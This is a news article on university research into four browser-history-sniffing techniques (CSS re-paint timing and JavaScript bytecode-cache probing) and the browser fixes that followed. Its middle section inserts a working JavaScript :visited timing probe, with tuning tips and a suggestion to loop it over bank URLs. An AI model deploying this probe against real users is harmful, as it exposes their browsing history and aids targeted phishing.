50 ways to leave your lover, but four to sniff browser history

Vulnerabilities that expose browsing history yet to be fixed


"History sniffing" promises a nose full of dust or, if you're talking about web browsers, a whiff of the websites you've visited.

And that may be enough to compromise your privacy and expose data that allows miscreants to target you more effectively with tailored attacks. For example, a phishing gambit that attempts to simulate your bank login page has a better chance of success if it presents the web page for a bank where you actually have an account.

In August, at the 2018 USENIX Workshop on Offensive Technologies (WOOT), security researchers from Stanford University and UC San Diego described four novel attack techniques designed to reveal the browsing histories of internet users.

Three of these are "re-paint" attacks: they time how long the browser takes to re-render a link whose color depends on the :visited selector, and use that delay to infer whether the link's target has been visited. The fourth probes the JavaScript bytecode cache to determine whether the browser has previously compiled a particular JavaScript file, from which the attacker infers that the site serving that file has been visited.

CSS visited-link disclosure risks first surfaced in 2002. Browsers addressed them around 2010 by restricting which properties :visited may style and by having getComputedStyle report the unvisited style, but the issue has resurfaced thanks to newer web APIs.

Google, given advance notice by the researchers, fixed the most serious of the flaws (CVE-2018-6137) in Chrome 67 back in May. The vulnerability allowed an attacker to determine whether or not a link had been visited by using the CSS Paint API to check whether a "paint" method – used to change the color of visited links – had been invoked. The technique allowed an attacker to probe for visited links at a rate of about 3,000 per second.

But three of the vulnerabilities remain. In an email to The Register, Deian Stefan, an assistant professor in UC San Diego's computer science and engineering department, confirmed as much, though he noted that the remaining flaws are timing side channels, which makes them considerably less severe than the CSS Paint API attack.

Stefan and his colleagues say Google Chrome, Mozilla Firefox, Microsoft Edge and Internet Explorer, and Brave are all affected to some extent. Those who favor the Tor browser are immune to these attacks since Tor doesn't store a user's browser history.

The unaddressed attacks involve abuses of CSS 3D transforms, SVG fill-coloring, and the JavaScript bytecode cache.

The 3D transform attack, for example, stacks a series of 3D transforms on top of other CSS effects to create a link that is expensive to render. The attacker's script switches the link's destination back and forth between two URLs; whenever the switch changes the link's :visited status, the browser applies the :visited color and performs a computationally costly re-paint. JavaScript can observe that cost by monitoring the page's rendering performance, and so learn whether the URL was visited.
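To make the mechanics of that re-paint timing probe concrete, here is an added example of how such a probe is structured. It was written for this article and is not the researchers' code. The CSS used to make the link expensive to render, the frame counts, the 1.5x timing threshold and the attacker.example host used to mint never-visited URLs are all assumptions; the only structural claim is that a toggle which flips :visited costs a re-paint that a toggle between two unvisited URLs does not. Whether a given browser release still leaks this way is something you would have to measure, and the top-level call only runs in a browser.

```javascript
// Added example: skeleton of a :visited re-paint timing probe of the kind
// described in the article. Not the researchers' code. The CSS, frame counts,
// threshold and attacker.example host are assumptions.

// Median of an array of numbers (robust against a few slow frames from GC etc.).
function median(xs) {
  const s = [...xs].sort((a, b) => a - b);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// Decision logic. baselineMs: frame times while toggling between two URLs that
// are both unvisited (no :visited change, so no costly re-paint). candidateMs:
// frame times while toggling between the candidate URL and an unvisited URL.
// If the candidate was visited, every toggle flips :visited and forces the
// expensive re-paint, so frames take measurably longer. The 1.5x ratio is assumed.
function classifyVisited(baselineMs, candidateMs, ratio = 1.5) {
  return median(candidateMs) > median(baselineMs) * ratio;
}

// Build a link whose :visited state costs a lot to re-paint. The stacked
// transform/filter/shadow combination is an assumed choice, not the paper's.
// Only color is changed by :visited (browsers restrict :visited to color-type
// properties); the two colors differ by one unit so the user sees nothing.
function buildProbe(doc) {
  const style = doc.createElement('style');
  style.textContent = `
    #probe { display:block; width:800px; height:800px; font-size:200px;
             text-shadow: 0 0 40px #444;
             filter: blur(3px) contrast(150%) drop-shadow(10px 10px 20px #222);
             transform: perspective(400px) rotateX(40deg) rotateY(25deg) translateZ(60px); }
    #probe:link    { color: #000000; }
    #probe:visited { color: #010101; }
  `;
  doc.head.appendChild(style);
  const a = doc.createElement('a');
  a.id = 'probe';
  a.textContent = 'XXXXXXXX';
  doc.body.appendChild(a);
  return a;
}

// Toggle the link between urlA and urlB once per animation frame and record
// the interval between frames (a proxy for the frame's layout + paint cost).
function measureToggle(win, link, urlA, urlB, frames = 60) {
  return new Promise(resolve => {
    const durations = [];
    let last = win.performance.now();
    let i = 0;
    function step(now) {
      durations.push(now - last);
      last = now;
      link.href = (i++ % 2) ? urlA : urlB;
      if (i < frames) win.requestAnimationFrame(step); else resolve(durations);
    }
    win.requestAnimationFrame(step);
  });
}

// Run the probe for one candidate URL. "Never visited" URLs are assumed to be
// fresh random subdomains of an attacker-controlled host (attacker.example).
async function sniff(win, candidateUrl) {
  const link = buildProbe(win.document);
  const fresh = () => `https://${Math.random().toString(36).slice(2)}.attacker.example/`;
  const baseline = await measureToggle(win, link, fresh(), fresh());
  const candidate = await measureToggle(win, link, candidateUrl, fresh());
  return classifyVisited(baseline, candidate);
}

// Only meaningful in a browser; Node has no window/document, so nothing runs there.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  sniff(window, 'https://example.com/').then(v => console.log('example.com visited?', v));
}
```

Loaded into a page, the script prints one verdict for the candidate URL; in practice an attacker would loop sniff() over a list of bank or service URLs. The part worth tuning is classifyVisited: frame intervals are noisy, so a median over several dozen frames and a comparison against a same-page baseline, rather than an absolute millisecond threshold, is what makes the channel usable at all.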

Stefan said the remaining browser history attacks are being discussed by developers involved with the World Wide Web Consortium (W3C). "We've also been talking with Firefox and Chrome folks about doing measurements to see what impact this fix may have on existing sites," he said.

As a defense, the researchers have suggested that browser makers adopt a same-origin-style policy covering all persistent data, such as visited-link state and the bytecode cache, similar to the same-origin policy that already governs what a script from one origin may read from another.

The Register asked Brave, Google, and Mozilla for comment but we've not heard back. ®
